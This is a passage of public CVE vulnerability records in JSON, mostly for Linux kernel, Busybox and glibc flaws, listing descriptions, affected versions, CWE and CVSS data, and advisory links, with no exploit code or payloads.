"dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-42377
Vulnerability from cvelistv5
Published
2021-11-15 00:00
Modified
2024-08-04 03:30
Severity ?
EPSS score ?
Summary
An attacker-controlled pointer free in Busybox's hush applet leads to denial of service and possible code execution when processing a crafted shell command, due to the shell mishandling the &&& string. This may be used for remote code execution under rare conditions of filtered command input.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T03:30:38.349Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "tags": [ "x_transferred" ], "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "busybox", "vendor": "busybox", "versions": [ { "lessThan": "1.34.0", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "An attacker-controlled pointer free in Busybox\u0027s hush applet leads to denial of service and possible code execution when processing a crafted shell command, due to the shell mishandling the \u0026\u0026\u0026 string. This may be used for remote code execution under rare conditions of filtered command input." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-590", "description": "CWE-590", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-25T00:00:00", "orgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "shortName": "JFROG" }, "references": [ { "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ] } }, "cveMetadata": { "assignerOrgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "assignerShortName": "JFROG", "cveId": "CVE-2021-42377", "datePublished": "2021-11-15T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-04T03:30:38.349Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-41222
Vulnerability from cvelistv5
Published
2022-09-21 00:00
Modified
2024-08-03 12:35
Severity ?
EPSS score ?
Summary
mm/mremap.c in the Linux kernel before 5.13.3 has a use-after-free via a stale TLB because an rmap lock is not held during a PUD move.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T12:35:49.614Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.3" }, { "tags": [ "x_transferred" ], "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2347" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=97113eb39fa7972722ff490b947d8af023e1f6a2" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/168466/Linux-Stable-5.4-5.10-Use-After-Free-Race-Condition.html" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230214-0008/" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/171005/Kernel-Live-Patch-Security-Notice-LNS-0091-1.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "mm/mremap.c in the Linux kernel before 5.13.3 has a use-after-free via a stale TLB because an rmap lock is not held during a PUD move." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-15T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.3" }, { "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2347" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=97113eb39fa7972722ff490b947d8af023e1f6a2" }, { "url": "http://packetstormsecurity.com/files/168466/Linux-Stable-5.4-5.10-Use-After-Free-Race-Condition.html" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230214-0008/" }, { "url": "http://packetstormsecurity.com/files/171005/Kernel-Live-Patch-Security-Notice-LNS-0091-1.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-41222", "datePublished": "2022-09-21T00:00:00", "dateReserved": "2022-09-21T00:00:00", "dateUpdated": "2024-08-03T12:35:49.614Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-42432
Vulnerability from cvelistv5
Published
2023-03-29 00:00
Modified
2024-08-03 13:10
Severity ?
EPSS score ?
Summary
This vulnerability allows local attackers to disclose sensitive information on affected installations of the Linux Kernel 6.0-rc2. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the nft_osf_eval function. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the kernel. Was ZDI-CAN-18540.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:10:40.840Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-22-1457/" }, { "tags": [ "x_transferred" ], "url": "https://patchwork.ozlabs.org/project/netfilter-devel/patch/20220907082618.1193201-1-pablo%40netfilter.org/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "6.0-rc2" } ] } ], "credits": [ { "lang": "en", "value": "Gwangun Jung at THEORI" } ], "descriptions": [ { "lang": "en", "value": "This vulnerability allows local attackers to disclose sensitive information on affected installations of the Linux Kernel 6.0-rc2. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the nft_osf_eval function. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the kernel. Was ZDI-CAN-18540." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:L", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-457", "description": "CWE-457: Use of Uninitialized Variable", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-03-29T00:00:00", "orgId": "99f1926a-a320-47d8-bbb5-42feb611262e", "shortName": "zdi" }, "references": [ { "url": "https://www.zerodayinitiative.com/advisories/ZDI-22-1457/" }, { "url": "https://patchwork.ozlabs.org/project/netfilter-devel/patch/20220907082618.1193201-1-pablo%40netfilter.org/" } ] } }, "cveMetadata": { "assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e", "assignerShortName": "zdi", "cveId": "CVE-2022-42432", "datePublished": "2023-03-29T00:00:00", "dateReserved": "2022-10-03T00:00:00", "dateUpdated": "2024-08-03T13:10:40.840Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-33574
Vulnerability from cvelistv5
Published
2021-05-25 00:00
Modified
2024-08-03 23:50
Severity ?
EPSS score ?
Summary
The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T23:50:43.098Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1" }, { "name": "FEDORA-2021-7ddb8b0537", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20210629-0005/" }, { "name": "GLSA-202107-07", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202107-07" }, { "name": "FEDORA-2021-f29b4643c7", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-17T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1" }, { "name": "FEDORA-2021-7ddb8b0537", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/" }, { "url": "https://security.netapp.com/advisory/ntap-20210629-0005/" }, { "name": "GLSA-202107-07", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202107-07" }, { "name": "FEDORA-2021-f29b4643c7", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-33574", "datePublished": "2021-05-25T00:00:00", "dateReserved": "2021-05-25T00:00:00", "dateUpdated": "2024-08-03T23:50:43.098Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3534
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
A vulnerability classified as critical has been found in Linux Kernel. Affected is the function btf_dump_name_dups of the file tools/lib/bpf/btf_dump.c of the component libbpf. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211032.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:02.420Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=93c660ca40b5d2f7c1b1626e955a8e9fa30e0749" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.211032" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability classified as critical has been found in Linux Kernel. Affected is the function btf_dump_name_dups of the file tools/lib/bpf/btf_dump.c of the component libbpf. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211032." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-17T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=93c660ca40b5d2f7c1b1626e955a8e9fa30e0749" }, { "url": "https://vuldb.com/?id.211032" } ], "title": "Linux Kernel libbpf btf_dump.c btf_dump_name_dups use after free", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3534", "datePublished": "2022-10-17T00:00:00", "dateReserved": "2022-10-17T00:00:00", "dateUpdated": "2024-08-03T01:14:02.420Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-42379
Vulnerability from cvelistv5
Published
2021-11-15 00:00
Modified
2024-08-04 03:30
Severity ?
EPSS score ?
Summary
A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file function
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T03:30:38.266Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "tags": [ "x_transferred" ], "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "busybox", "vendor": "busybox", "versions": [ { "lessThan": "1.34.0", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free in Busybox\u0027s awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file function" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-25T00:00:00", "orgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "shortName": "JFROG" }, "references": [ { "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ] } }, "cveMetadata": { "assignerOrgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "assignerShortName": "JFROG", "cveId": "CVE-2021-42379", "datePublished": "2021-11-15T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-04T03:30:38.266Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-42328
Vulnerability from cvelistv5
Published
2022-12-07 00:00
Modified
2024-08-03 13:03
Severity ?
EPSS score ?
Summary
Guests can trigger deadlock in Linux netback driver T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] The patch for XSA-392 introduced another issue which might result in a deadlock when trying to free the SKB of a packet dropped due to the XSA-392 handling (CVE-2022-42328). Additionally when dropping packages for other reasons the same deadlock could occur in case of netpoll being active for the interface the xen-netback driver is connected to (CVE-2022-42329).
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:03:45.967Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://xenbits.xenproject.org/xsa/advisory-424.txt" }, { "name": "[oss-security] 20221208 Re: Xen Security Advisory 424 v1 (CVE-2022-42328,CVE-2022-42329) - Guests can trigger deadlock in Linux netback driver", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/12/08/3" }, { "name": "[oss-security] 20221208 Re: Xen Security Advisory 424 v1 (CVE-2022-42328,CVE-2022-42329) - Guests can trigger deadlock in Linux netback driver", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/12/08/2" }, { "name": "[oss-security] 20221209 Re: Xen Security Advisory 424 v1 (CVE-2022-42328,CVE-2022-42329) - Guests can trigger deadlock in Linux netback driver", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/12/09/2" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux", "vendor": "Linux", "versions": [ { "status": "unknown", "version": "consult Xen advisory XSA-424" } ] } ], "descriptions": [ { "lang": "en", "value": "Guests can trigger deadlock in Linux netback driver T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] The patch for XSA-392 introduced another issue which might result in a deadlock when trying to free the SKB of a packet dropped due to the XSA-392 handling (CVE-2022-42328). Additionally when dropping packages for other reasons the same deadlock could occur in case of netpoll being active for the interface the xen-netback driver is connected to (CVE-2022-42329)." } ], "metrics": [ { "other": { "content": { "description": { "description_data": [ { "lang": "eng", "value": "A malicious guest could cause Denial of Service (DoS) of the host via\nthe paravirtualized network interface." } ] } }, "type": "unknown" } } ], "problemTypes": [ { "descriptions": [ { "description": "unknown", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-24T00:00:00", "orgId": "23aa2041-22e1-471f-9209-9b7396fa234f", "shortName": "XEN" }, "references": [ { "url": "https://xenbits.xenproject.org/xsa/advisory-424.txt" }, { "name": "[oss-security] 20221208 Re: Xen Security Advisory 424 v1 (CVE-2022-42328,CVE-2022-42329) - Guests can trigger deadlock in Linux netback driver", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2022/12/08/3" }, { "name": "[oss-security] 20221208 Re: Xen Security Advisory 424 v1 (CVE-2022-42328,CVE-2022-42329) - Guests can trigger deadlock in Linux netback driver", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2022/12/08/2" }, { "name": "[oss-security] 20221209 Re: Xen Security Advisory 424 v1 (CVE-2022-42328,CVE-2022-42329) - Guests can trigger deadlock in Linux netback driver", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2022/12/09/2" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ] } }, "cveMetadata": { "assignerOrgId": "23aa2041-22e1-471f-9209-9b7396fa234f", "assignerShortName": "XEN", "cveId": "CVE-2022-42328", "datePublished": "2022-12-07T00:00:00", "dateReserved": "2022-10-03T00:00:00", "dateUpdated": "2024-08-03T13:03:45.967Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3594
Vulnerability from cvelistv5
Published
2022-10-18 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function intr_callback of the file drivers/net/usb/r8152.c of the component BPF. The manipulation leads to logging of excessive data. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211363.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:02.039Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=93e2be344a7db169b7119de21ac1bf253b8c6907" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.211363" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function intr_callback of the file drivers/net/usb/r8152.c of the component BPF. The manipulation leads to logging of excessive data. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211363." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-404", "description": "CWE-404 Denial of Service -\u003e CWE-779 Logging of Excessive Data", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-24T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=93e2be344a7db169b7119de21ac1bf253b8c6907" }, { "url": "https://vuldb.com/?id.211363" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "Linux Kernel BPF r8152.c intr_callback logging of excessive data", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3594", "datePublished": "2022-10-18T00:00:00", "dateReserved": "2022-10-18T00:00:00", "dateUpdated": "2024-08-03T01:14:02.039Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-0394
Vulnerability from cvelistv5
Published
2023-01-24 00:00
Modified
2024-08-02 05:10
Severity ?
EPSS score ?
Summary
A NULL pointer dereference flaw was found in rawv6_push_pending_frames in net/ipv6/raw.c in the network subcomponent in the Linux kernel. This flaw causes the system to crash.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:10:55.666Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cb3e9864cdbe35ff6378966660edbcbac955fe17" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230302-0005/" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux kernel prior to Kernel 6.2 RC4" } ] } ], "descriptions": [ { "lang": "en", "value": "A NULL pointer dereference flaw was found in rawv6_push_pending_frames in net/ipv6/raw.c in the network subcomponent in the Linux kernel. This flaw causes the system to crash." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-03T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cb3e9864cdbe35ff6378966660edbcbac955fe17" }, { "url": "https://security.netapp.com/advisory/ntap-20230302-0005/" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-0394", "datePublished": "2023-01-24T00:00:00", "dateReserved": "2023-01-18T00:00:00", "dateUpdated": "2024-08-02T05:10:55.666Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-2078
Vulnerability from cvelistv5
Published
2022-06-30 00:00
Modified
2024-08-03 00:24
Severity ?
